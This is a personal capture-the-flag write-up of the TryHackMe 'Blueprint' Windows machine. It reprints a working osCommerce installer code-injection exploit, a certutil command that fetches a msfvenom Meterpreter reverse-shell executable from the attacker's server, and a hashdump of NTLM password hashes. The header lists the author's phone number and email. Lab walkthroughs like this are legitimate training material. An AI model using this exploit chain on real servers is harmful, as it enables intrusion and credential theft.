'''''''''''''''''''''''''''''''''''''''''''''''''''''''
''
'' 		 Try Hack Me : Blueprint 
'' 
''
''		Try Hack Me , My User Name : Lime1O1
'' 
''
''		Phone : 01026102300
''
''		Email : Lime1O1Red@gmail.com 
''
''		Facebook : https://www.facebook.com/profile.php?id=100070215322755 
''
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''



Description : 

	Blueprint is an easy level boot2root machine on TryHackMe. The machine is a Windows 7 machine which hosts a web server on port 443. That web server is an outdated version of osCommerce. After enumerating the install directory of the web app, we could install osCommerce. After that a arbitrary file upload vulnerability has been used to upload a web shell. Finally this web shell has be used to gain a Meterpreter session on the box with System privileges.

	Blueprint, another Windows challenge from TryHackMe (https://tryhackme.com/room/blueprint), requires the user to use their scanning and enumeration skills, along with being curious enough to click through links and directories to be successful.  In today's walkthrough we will show you the manual way to exploit this Windows machine, secure the required NTLM hash, and find the Root flag for submission.  So let's get started!



Blueprint
$IP = 10.10.98.242




Enumeration :

 # First of all an Nmap scan has been started.

$ sudo nmap -Pn 10.10.98.242 

'''
Starting Nmap 7.80 ( https://nmap.org ) at 2021-10-03 08:15 EDT
Nmap scan report for 10.10.98.242 (10.10.98.242)
Host is up (0.46s latency).
Not shown: 987 closed ports
PORT      STATE SERVICE
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
443/tcp   open  https
445/tcp   open  microsoft-ds
3306/tcp  open  mysql
8080/tcp  open  http-proxy
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49158/tcp open  unknown
49159/tcp open  unknown
49160/tcp open  unknown


'''


##################################################################################################################


$ sudo nmap -Pn -p 80,135,139,443,445,3306,8080  -A 10.10.98.242  

'''
Starting Nmap 7.80 ( https://nmap.org ) at 2021-10-03 08:36 EDT
Nmap scan report for 10.10.98.242 (10.10.98.242)
Host is up (0.49s latency).

PORT     STATE SERVICE      VERSION
80/tcp   open  http         Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: 404 - File or directory not found.
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp  open  ssl/http     Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
|_http-title: Index of /
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp  open  microsoft-ds Windows 7 Home Basic 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open  mysql        MariaDB (unauthorized)
8080/tcp open  http         Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2h PHP/5.6.28
|_http-title: Index of /
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Server 2008 R2 SP1 (96%), Microsoft Windows 7 or 8.1 R1 or Server 2008 R2 SP1 (93%), Microsoft Windows 7 or 8.1 R1 (93%), Microsoft Windows 8.1 (93%), Microsoft Windows 10 (91%), Microsoft Windows 10 10586 - 14393 (91%), Microsoft Windows 10 1607 (91%), Microsoft Windows Home Server 2011 (Windows Server 2008 R2) (91%), Microsoft Windows Server 2008 SP1 (91%), Microsoft Windows Server 2008 SP2 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 5 hops
Service Info: Hosts: www.example.com, BLUEPRINT, localhost; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -20m06s, deviation: 34m37s, median: -7s
|_nbstat: NetBIOS name: BLUEPRINT, NetBIOS user: <unknown>, NetBIOS MAC: 02:82:5d:fb:39:fb (unknown)
| smb-os-discovery: 
|   OS: Windows 7 Home Basic 7601 Service Pack 1 (Windows 7 Home Basic 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1
|   Computer name: BLUEPRINT
|   NetBIOS computer name: BLUEPRINT\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-10-03T13:37:12+01:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-10-03T12:37:13
|_  start_date: 2021-10-03T12:14:03


'''
##########################################################################


# The machine is pretty straight forward, has a combination of SMB and web server elements.  Of note is the MariaDB server running on 3306.  This suggests there is a # database somewhere that is available to on the frontend.  Either way, now that we know what we are looking at, let's enumerate.



# After the scan a few services could be found on the target machine. Through SMB we had access to sensitive data without authentication.


$ sudo smbclient -L \\\\10.10.168.67\\

'''

Enter WORKGROUP\root's password: 

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	IPC$            IPC       Remote IPC
	Users           Disk      
	Windows         Disk      

'''

We did not find anything useful in SMB


#######################################################################################################

# On port 80 the web server is not serving anything interesting.

# But on port 443 directory indexing is enabled and we could find an outdated version of osCommerce.



# We really need to dig deeper into the oscommerce-2.3.4 service itself to understand the exploitation side.  A msfconsole search showed the # following.

$ msfconcole 
$ search search oscommerce

'''

Matching Modules
================

   #  Name                                                      Disclosure Date  Rank       Check  Description
   -  ----                                                      ---------------  ----       -----  -----------
   0  exploit/unix/webapp/oscommerce_filemanager                2009-08-31       excellent  No     osCommerce 2.2 Arbitrary PHP Code Execution
   1  exploit/multi/http/oscommerce_installer_unauth_code_exec  2018-04-30       excellent  Yes    osCommerce Installer Unauthenticated Code Execution

'''

# using searchsploit

$ searchsploit oscommerce 2.3.4

'''
--------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                 |  Path
--------------------------------------------------------------------------------------------------------------- ---------------------------------
osCommerce 2.3.4 - Multiple Vulnerabilities                                                                    | php/webapps/34582.txt
osCommerce 2.3.4.1 - 'currency' SQL Injection                                                                  | php/webapps/46328.txt
osCommerce 2.3.4.1 - 'products_id' SQL Injection                                                               | php/webapps/46329.txt
osCommerce 2.3.4.1 - 'reviews_id' SQL Injection                                                                | php/webapps/46330.txt
osCommerce 2.3.4.1 - 'title' Persistent Cross-Site Scripting                                                   | php/webapps/49103.txt
osCommerce 2.3.4.1 - Arbitrary File Upload                                                                     | php/webapps/43191.py
osCommerce 2.3.4.1 - Remote Code Execution                                                                     | php/webapps/44374.py
osCommerce 2.3.4.1 - Remote Code Execution (2)                                                                 | php/webapps/50128.py
--------------------------------------------------------------------------------------------------------------- ---------------------------------

'''


###################################################################################################################


1 - Exploitation in the first way without using { METASPLOIT }
		
		1 - Remote Code Execution 


$ locate 44374.py

/home/lime/Desktop/tools/exploit-database/exploits/php/webapps/44374.py

$ cp  /home/lime/Desktop/tools/exploit-database/exploits/php/webapps/44374.py . 


$ cat  44374.py

##########################################################################################3

# Exploit Title: osCommerce 2.3.4.1 Remote Code Execution
# Date: 29.0.3.2018
# Exploit Author: Simon Scannell - https://scannell-infosec.net <contact@scannell-infosec.net>
# Version: 2.3.4.1, 2.3.4 - Other versions have not been tested but are likely to be vulnerable
# Tested on: Linux, Windows

# If an Admin has not removed the /install/ directory as advised from an osCommerce installation, it is possible
# for an unauthenticated attacker to reinstall the page. The installation of osCommerce does not check if the page
# is already installed and does not attempt to do any authentication. It is possible for an attacker to directly
# execute the "install_4.php" script, which will create the config file for the installation. It is possible to inject
# PHP code into the config file and then simply executing the code by opening it.


import requests

# enter the the target url here, as well as the url to the install.php (Do NOT remove the ?step=4)
base_url = "http://localhost//oscommerce-2.3.4.1/catalog/"
target_url = "http://localhost/oscommerce-2.3.4.1/catalog/install/install.php?step=4"

data = {
    'DIR_FS_DOCUMENT_ROOT': './'
}

# the payload will be injected into the configuration file via this code
# '  define(\'DB_DATABASE\', \'' . trim($HTTP_POST_VARS['DB_DATABASE']) . '\');' . "\n" .
# so the format for the exploit will be: '); PAYLOAD; /*

payload = '\');'
payload += 'system("ls");'    # this is where you enter you PHP payload
payload += '/*'

data['DB_DATABASE'] = payload

# exploit it
r = requests.post(url=target_url, data=data)

if r.status_code == 200:
    print("[+] Successfully launched the exploit. Open the following URL to execute your code\n\n" + base_url + "install/includes/configure.php")
else:
    print("[-] Exploit did not execute as planned")



############################################################################################################################

#   We will make some adjustments


base_url = "http://10.10.168.67:8080/oscommerce-2.3.4/catalog/"
target_url = "http://10.10.168.67:8080//oscommerce-2.3.4/catalog/install/install.php?step=4"
payload += 'shell_exec("ping { YOUR_IP } ");'  # to send icmp packets 



$ sudo python3 44374.py 
[+] Successfully launched the exploit. Open the following URL to execute your code

http://10.10.168.67:8080/oscommerce-2.3.4/catalog/install/includes/configure.php



Now We Need To Acces THis Url To Run Exploit : http://10.10.168.67:8080/oscommerce-2.3.4/catalog/install/includes/configure.php



To make sure the exploit works , We will use tcpdump to capture icmp packets 

$ curl  http://10.10.168.67:8080/oscommerce-2.3.4/catalog/install/includes/configure.php

###################################################################################################


$ sudo tcpdump  -i tun0  icmp


tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
08:50:17.403609 IP 10.10.168.67 > 10.8.203.69: ICMP echo request, id 1, seq 13, length 40
08:50:17.403674 IP 10.8.203.69 > 10.10.168.67: ICMP echo reply, id 1, seq 13, length 40
08:50:18.409865 IP 10.10.168.67 > 10.8.203.69: ICMP echo request, id 1, seq 14, length 40
08:50:18.409908 IP 10.8.203.69 > 10.10.168.67: ICMP echo reply, id 1, seq 14, length 40
08:50:19.759184 IP 10.10.168.67 > 10.8.203.69: ICMP echo request, id 1, seq 15, length 40
08:50:19.759257 IP 10.8.203.69 > 10.10.168.67: ICMP echo reply, id 1, seq 15, length 40
08:50:20.885276 IP 10.10.168.67 > 10.8.203.69: ICMP echo request, id 1, seq 16, length 40
08:50:20.885330 IP 10.8.203.69 > 10.10.168.67: ICMP echo reply, id 1, seq 16, length 40


###################################################################################################################

# Now the exploitation is working


Fothold : 

Now we will force the server to download  malicious exe File 

$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > fire.exe


msfconsole  >> Using Metasploit 

$ sudo python3 -m http.server 9898


############################################################################################################################


$ sudo python3 44374.py

payload = '\');'
payload += 'shell_exec(" certutil.exe -urlcache -f http://{YOUR_IP}:{YOUR_PORT}/fire.exe fire.exe");' 
payload += '/*'




$ curl  http://10.10.168.67:8080/oscommerce-2.3.4/catalog/install/includes/configure.php


payload = '\');'
payload += 'shell_exec("fire.exe ");'    # this is where you enter you PHP payload
payload += '/*'


$ curl  http://10.10.168.67:8080/oscommerce-2.3.4/catalog/install/includes/configure.php





meterpreter > hashdump 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:549a1bcb88e35dc18c7a0b0168631411:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Lab:1000:aad3b435b51404eeaad3b435b51404ee:30e87bf999828446a1c1209ddde4c450:::
meterpreter > pwd
C:\xampp\htdocs\oscommerce-2.3.4\catalog\install\includes
meterpreter > whoai
[-] Unknown command: whoai
meterpreter > cd 
Usage: cd directory
meterpreter > cd ..
meterpreter > cd /
meterpreter > pwd
C:\
meterpreter > dir
Listing: C:\
============

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
40777/rwxrwxrwx   0        dir   2009-07-13 22:36:15 -0400  $Recycle.Bin
100444/r--r--r--  8192     fil   2017-01-15 17:39:38 -0500  BOOTSECT.BAK
40777/rwxrwxrwx   4096     dir   2017-01-15 17:39:36 -0500  Boot
40777/rwxrwxrwx   0        dir   2009-07-14 00:53:55 -0400  Documents and Settings
40777/rwxrwxrwx   0        dir   2009-07-13 22:37:05 -0400  PerfLogs
40555/r-xr-xr-x   4096     dir   2009-07-13 22:37:05 -0400  Program Files
40777/rwxrwxrwx   4096     dir   2009-07-13 22:37:05 -0400  ProgramData
40777/rwxrwxrwx   0        dir   2017-01-15 10:04:10 -0500  Python27
40777/rwxrwxrwx   0        dir   2017-01-15 01:48:52 -0500  Recovery
100444/r--r--r--  416968   fil   2017-01-15 18:05:48 -0500  SZWML
40777/rwxrwxrwx   4096     dir   2017-01-15 17:40:44 -0500  System Volume Information
40555/r-xr-xr-x   4096     dir   2009-07-13 22:37:05 -0400  Users
100666/rw-rw-rw-  232960   fil   2007-11-07 03:12:28 -0500  VC_RED.MSI
100666/rw-rw-rw-  1442522  fil   2007-11-07 03:09:22 -0500  VC_RED.cab
40777/rwxrwxrwx   16384    dir   2009-07-13 22:37:05 -0400  Windows
100777/rwxrwxrwx  24       fil   2009-07-13 22:04:04 -0400  autoexec.bat
100444/r--r--r--  399860   fil   2017-01-15 17:39:36 -0500  bootmgr
100666/rw-rw-rw-  10       fil   2009-07-13 22:04:04 -0400  config.sys
100666/rw-rw-rw-  17734    fil   2007-11-07 03:00:40 -0500  eula.1028.txt
100666/rw-rw-rw-  17734    fil   2007-11-07 03:00:40 -0500  eula.1031.txt
100666/rw-rw-rw-  10134    fil   2007-11-07 03:00:40 -0500  eula.1033.txt
100666/rw-rw-rw-  17734    fil   2007-11-07 03:00:40 -0500  eula.1036.txt
100666/rw-rw-rw-  17734    fil   2007-11-07 03:00:40 -0500  eula.1040.txt
100666/rw-rw-rw-  118      fil   2007-11-07 03:00:40 -0500  eula.1041.txt
100666/rw-rw-rw-  17734    fil   2007-11-07 03:00:40 -0500  eula.1042.txt
100666/rw-rw-rw-  17734    fil   2007-11-07 03:00:40 -0500  eula.2052.txt
100666/rw-rw-rw-  17734    fil   2007-11-07 03:00:40 -0500  eula.3082.txt
100666/rw-rw-rw-  1110     fil   2007-11-07 03:00:40 -0500  globdata.ini
0000/---------    0        fif   1969-12-31 19:00:00 -0500  hiberfil.sys
40777/rwxrwxrwx   0        dir   2017-01-24 16:50:47 -0500  inetpub
100777/rwxrwxrwx  562688   fil   2007-11-07 03:03:18 -0500  install.exe
100666/rw-rw-rw-  843      fil   2007-11-07 03:00:40 -0500  install.ini
100666/rw-rw-rw-  76304    fil   2007-11-07 03:03:18 -0500  install.res.1028.dll
100666/rw-rw-rw-  96272    fil   2007-11-07 03:03:18 -0500  install.res.1031.dll
100666/rw-rw-rw-  91152    fil   2007-11-07 03:03:18 -0500  install.res.1033.dll
100666/rw-rw-rw-  97296    fil   2007-11-07 03:03:18 -0500  install.res.1036.dll
100666/rw-rw-rw-  95248    fil   2007-11-07 03:03:18 -0500  install.res.1040.dll
100666/rw-rw-rw-  81424    fil   2007-11-07 03:03:18 -0500  install.res.1041.dll
100666/rw-rw-rw-  79888    fil   2007-11-07 03:03:18 -0500  install.res.1042.dll
100666/rw-rw-rw-  75792    fil   2007-11-07 03:03:18 -0500  install.res.2052.dll
100666/rw-rw-rw-  96272    fil   2007-11-07 03:03:18 -0500  install.res.3082.dll
0000/---------    0        fif   1969-12-31 19:00:00 -0500  pagefile.sys
100666/rw-rw-rw-  5686     fil   2007-11-07 03:00:40 -0500  vcredist.bmp
40777/rwxrwxrwx   8192     dir   2017-01-17 09:36:28 -0500  xampp

meterpreter > cd Users 
meterpreter > ls
Listing: C:\Users
=================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
40777/rwxrwxrwx   8192  dir   2019-04-11 18:36:40 -0400  Administrator
40777/rwxrwxrwx   0     dir   2009-07-14 00:53:55 -0400  All Users
40555/r-xr-xr-x   8192  dir   2009-07-13 22:37:05 -0400  Default
40777/rwxrwxrwx   0     dir   2009-07-14 00:53:55 -0400  Default User
40777/rwxrwxrwx   8192  dir   2017-03-21 11:30:50 -0400  DefaultAppPool
40777/rwxrwxrwx   8192  dir   2017-01-15 01:49:03 -0500  Lab
40555/r-xr-xr-x   4096  dir   2009-07-13 22:37:05 -0400  Public
100666/rw-rw-rw-  174   fil   2009-07-14 00:41:57 -0400  desktop.ini

meterpreter > cd Administrator
meterpreter > dir
Listing: C:\Users\Administrator
===============================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40777/rwxrwxrwx   0       dir   2019-04-11 18:36:40 -0400  AppData
40777/rwxrwxrwx   0       dir   2019-04-11 18:36:40 -0400  Application Data
40555/r-xr-xr-x   0       dir   2019-04-11 18:36:41 -0400  Contacts
40777/rwxrwxrwx   0       dir   2019-04-11 18:36:40 -0400  Cookies
40555/r-xr-xr-x   0       dir   2019-04-11 18:36:40 -0400  Desktop
40555/r-xr-xr-x   4096    dir   2019-04-11 18:36:40 -0400  Documents
40555/r-xr-xr-x   0       dir   2019-04-11 18:36:40 -0400  Downloads
40555/r-xr-xr-x   0       dir   2019-04-11 18:36:40 -0400  Favorites
40555/r-xr-xr-x   0       dir   2019-04-11 18:36:40 -0400  Links
40777/rwxrwxrwx   0       dir   2019-04-11 18:36:40 -0400  Local Settings
40555/r-xr-xr-x   0       dir   2019-04-11 18:36:40 -0400  Music
40777/rwxrwxrwx   0       dir   2019-04-11 18:36:40 -0400  My Documents
100666/rw-rw-rw-  786432  fil   2019-04-11 18:36:40 -0400  NTUSER.DAT
100666/rw-rw-rw-  65536   fil   2019-04-11 18:36:40 -0400  NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TM.blf
100666/rw-rw-rw-  524288  fil   2019-04-11 18:36:40 -0400  NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000001.reg
                                                           trans-ms
100666/rw-rw-rw-  524288  fil   2019-04-11 18:36:40 -0400  NTUSER.DAT{6cced2f1-6e01-11de-8bed-001e0bcd1824}.TMContainer00000000000000000002.reg
                                                           trans-ms
40777/rwxrwxrwx   0       dir   2019-04-11 18:36:40 -0400  NetHood
40555/r-xr-xr-x   0       dir   2019-04-11 18:36:40 -0400  Pictures
40777/rwxrwxrwx   0       dir   2019-04-11 18:36:40 -0400  PrintHood
40777/rwxrwxrwx   0       dir   2019-04-11 18:36:40 -0400  Recent
40555/r-xr-xr-x   0       dir   2019-04-11 18:36:40 -0400  Saved Games
40555/r-xr-xr-x   0       dir   2019-04-11 18:36:47 -0400  Searches
40777/rwxrwxrwx   0       dir   2019-04-11 18:36:40 -0400  SendTo
40777/rwxrwxrwx   0       dir   2019-04-11 18:36:40 -0400  Start Menu
40777/rwxrwxrwx   0       dir   2019-04-11 18:36:40 -0400  Templates
40555/r-xr-xr-x   0       dir   2019-04-11 18:36:40 -0400  Videos
100666/rw-rw-rw-  262144  fil   2019-04-11 18:36:40 -0400  ntuser.dat.LOG1
100666/rw-rw-rw-  0       fil   2019-04-11 18:36:40 -0400  ntuser.dat.LOG2
100666/rw-rw-rw-  20      fil   2019-04-11 18:36:40 -0400  ntuser.ini

meterpreter > cd Desktop 
meterpreter > dir
Listing: C:\Users\Administrator\Desktop
=======================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100666/rw-rw-rw-  282   fil   2019-04-11 18:36:47 -0400  desktop.ini
100666/rw-rw-rw-  37    fil   2019-04-11 18:40:59 -0400  root.txt.txt

meterpreter > type root.txt.txt
[-] Unknown command: type
meterpreter > download root.txt.txt
[*] Downloading: root.txt.txt -> /home/lime/Desktop/root.txt.txt
[*] Downloaded 37.00 B of 37.00 B (100.0%): root.txt.txt -> /home/lime/Desktop/root.txt.txt
[*] download   : root.txt.txt -> /home/lime/Desktop/root.txt.txt
meterpreter > 

